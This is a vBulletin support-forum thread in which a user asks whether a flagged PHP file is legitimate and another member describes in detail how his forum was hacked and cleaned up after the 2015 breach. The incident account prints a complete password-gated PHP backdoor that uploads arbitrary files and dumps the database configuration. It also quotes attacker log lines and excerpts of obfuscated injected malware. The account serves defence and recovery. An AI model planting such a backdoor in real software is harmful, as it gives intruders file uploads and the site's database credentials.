My web host has detected a virus on the server. The file that they say is a virus "core/vbpatch_v10835.php". Does anyone know if this is a legit file?
Virus Detected on web host.
Collapse
X
-
Assuming you're operating on vBulletin 5.1.9 Patch Level 1, I have no such file in my vBulletin installation. -
Comment
-
Because vBulletin.com itself was hacked and its database compromised (see online news links at the end of this article or VB's password reset announcement), there was a complete list of all vBulletin website URLs that the hackers would have been able to access. This caused a lot of sites to be owned very fast.. I installed the patch just 24 hours after the security announcement and our forum (a small motorcycle club, hardly a high profile target) was already hacked. If you didn't install the patch within 24 hours, your vBulletin is probably owned too.
These hackers were sophisticated - using a large Russian botnet with hundreds of IP addresses they proceeded to drop malware files all over the codebase, including fake .php files in vBulletin as well as in Wordpress and other PHP applications on the server. In my case it all started with this file, which they dropped on the server Nov 6th 6:39PM pacific time, about 24 hours from the security bulletin's release and just hours before I installed the patch.
402 Nov 6 18:39 jsrender.php - in forum/core
/public_html_hacked/forum/core# more jsrender.php
<?php
if ((!isset($_REQUEST['pwd'])) || (empty($_REQUEST['pwd'])) || (md5($_REQUEST['pwd'])!='1a52094472487da553df7b35be694127')) die('NULL');
if (isset($_FILES['js']))
if (move_uploaded_file($_FILES['js']['tmp_name'],$_FILES['js']['name']))
echo $_FILES['js']['name'];
if (isset($_REQUEST['config']))
{
include('includes/config.php');
echo "\n\n<config>".json_encode($config)."</config>\n\n";
}
?>
this is a a simple file dropper script that was then used to install and hide more malware and eventually start a spam campaign. Here they are using it (they only needed to once):
188.163.80.234 - - [08/Nov/2015:11:12:49 -0800] "POST /forum/core/jsrender.php HTTP/1.0" 200 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
From there they created the following malware files (your malware files may vary though in your installation.. it doesn't matter as the whole codebase is throwaway, there's no way to accurately find all the malware and clean it, these guys know what they are doing). You will note they sneakily changed the dates on the .PHP files to Oct 24th, so it's impossible to just check by date to see which ones have changed. (Oct 24th is the date of when I last updated the vBulletin codebase, so the files hide amongst the other ones in the folder and don't show up as changed).
4768 Nov 8 11:12 vbpatch_v74862.php - in /forum/core
This is not a legit VB script, and looking at it confirms it's all obfuscated malware:
public_html_hacked/forum/core# cat vbpatch_v74862.php
<?php ${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6b\x64\x71\x79\x65e"]="\x76\x61lue";${"\x47\x4c\x4f\x42\x41L\x53"}["\x77\x62\x71q\x62\x67\x6f"]="\x6b\x65\x79";${"\x47LOB\x41\x4c\x53"}["t\x66\x62\x71\x75\x76\x75"]="\x64\x61\x74a";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x62ba\x6e\x68\x71\x76\x6e\x64k"]="i";${"\x47\x4c\x4fB\x41\x4c\x53"}["e\x77\x76\x74uj\x71f\x73c\x70"]="\x64at\x61";${"\x47LO\x42\x41L\x53"}["\x6fhnb\x68dky\x76"]="\x6f\x75t_d\x61\x74\x61";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6c\x73rir\x78u"]="d\x61\x74\x61\x5fke\x79";${"\x47L\x4f\x42\x41L\x53"}["x\x65\x77\x68\x72\x72\x68"]="\x64\x61\x74\x61"; [ ... etc ... ]
10938 Oct 24 15:15 error.php - stashed in our wordpress install at /wp-content/themes/Divi/css/error.php, this was used to send out porn spam
Oct 24 10:35 export.php - in /forum/core/vb/external/
223.252.30.129 - - [11/Nov/2015:17:27:52 -0800] "POST /forum/core/vb/external/export.php HTTP/1.0" 200 176 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
This one was the main spam gateway they used. it's sneaky in that they added code to the top of a real vBulletin file (there is an export.php at that location). The malware code is strange looking and easily to spot:
public_html_hacked/forum/core/vb/external# more export.php
<?php
$GLOBALS['gc45'];global$gc45;$gc45=$GLOBALS;$gc45['yc1b']="\x62\x72\x5e\x47\x6c\x5d\x6a\x30\
x46\x68\x57\x3f\x54\x64\x63\x5f\x33\x41\x5a\x22\x61\x78\x40\x23\x79\x2b\x49\x20\x2f\x3a\x6 b\x53\x9\x74\x3b\x38\x4b\x4a\x25
\x6d\x75\x4f\x59\x60\xa\x69\x3d\x45\x36\xd\x2a\x5b\x70\x37\x43\x77\x55\x56\x5c\x39\x7e\x2e \x7d\x2c\x73\x27\x7a\x32\x3c\x34
\x35\x24\x4c\x71\x6f\x44\x21\x48\x58\x31\x7c\x50\x51\x2d\x66\x65\x52\x26\x29\x67\x7b\x6e\x 76\x28\x4d\x3e\x42\x4e";$gc45[$g
c45['yc1b'][20].$gc45['yc1b'][70].$gc45['yc1b'][53].$gc45['yc1b'][16].$gc45['yc1b'][59].$gc45['yc1b'][14].$gc45['yc1b'][20
].$gc45['yc1b'][70].$gc45['yc1b'][53]]=$gc45['yc1b'][14].$gc45['yc1b'][9].$gc45['yc1b'][1];$gc45[$gc45['yc1b'][14].$gc45['
yc1b'][69].$gc45['yc1b'][69].$gc45['yc1b'][53]]=$gc45['yc1b'][74].$gc45['yc1b'][1].$gc45['yc1b'][13];$gc45[$gc45['yc1b'][2
0].$gc45['yc1b'][67].$gc45['yc1b'][79].$gc45['yc1b'][69].$gc45['yc1b'][48].$gc45['yc1b'][13]]=$gc45['yc1b'][64].$gc45['yc1
b'][33].$gc45['yc1b'][1].$gc45['yc1b'][4].$gc45['yc1b'][85].$gc45['yc1b'][91];$gc45[$gc45['yc1b'][66].$gc45['yc1b'][14].$g
c45['yc1b'][13].$gc45['yc1b'][79].$gc45['yc1b'][53].$gc45['yc1b'][85]]=$gc45['yc1b'][45].$gc45['yc1b'][91].$gc45['yc1b'][4
[.. further down the file the regular vBulletin PHP source can be found.]
In the end, I had to perform a full rebuild: I moved all the web files out of the way and rebuilt a cleanly downloaded PHP codebase for vBulletin (don't forget to patch it!!!) and also for my WordPress install. There IS no way you can reliably tell which files have changed as I mentioned above, these hackers exploiting this in bulk are sophisticated professional criminals and they use very cunning methods to hide their tracks. The only realistic method for recovery is to start fresh with either a backup from before this all happened (ie. pre Nov 8th) or by re-downloading all the vbulletin files again. Do not, under any circumstances, just assume you spotted all the malware and removed it, that will not be enough to keep them out.
In my case, the spammers tried to send out 80,000 graphic porn spams before I noticed and was able to shut them down. It was one of the more difficult cleanups I've performed, and I do this stuff for a living.
While I appreciate the rationale behind vBulletin's policy of keeping the info in the locked customer thread, I think it's important they recognize the unusual circumstances here.. namely that the initial compromise of the vB site has provided Russian spammers with a laundry list of sites to attack, which they then did attack within the first 24 hours. More information on detecting hacked activity, specific information on the attack vectors used this last weekend would be helpful information. Requiring customers to be paid up with the latest version to get this information is at best not providing any more security, and at worst gives the (mistaken) impression that VB is taking advantage of this situation as a cash grab, extorting compromised customers into purchasing the latest license in order to ugprade or get information. Insult to injury: there is really no current information to be had on the members only thread, other than mentioning the need to update and referencing 2 year old instructions on how to recover from hacks.
I urge VB to appreciate the scope of this problem and the unique situation here, and then make more information publicly available, since a great number of people are likely in this situation now. The cat is, after all, already out of the bag as a google news search for "vbulletin hack" shows. https://news.google.com/news/story?n...ved=0CCEQqgIwALast edited by jon mutiger; Thu 12 Nov '15, 10:08am.Comment
-
Thank you very much for the info.@jon mutiger . This happened on Nov 8th, that is 4 days ago. If I do a backup til then, then I lose 4 days worth of posts. My host stop the file for doing anything as soon as it was uploaded. Do you think it safe to say that I am good or should I really do a clean install of the vb software and use the backup file of the database?Comment
-
Jon doesn't know that your problem and his problem are the same problem. He's just guessing. He may be correct but what you need to do first is to check your database for suspect files.
AdminCP / Maintenance / Diagnostics / Suspect File VersionsComment
-
Comment
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Comment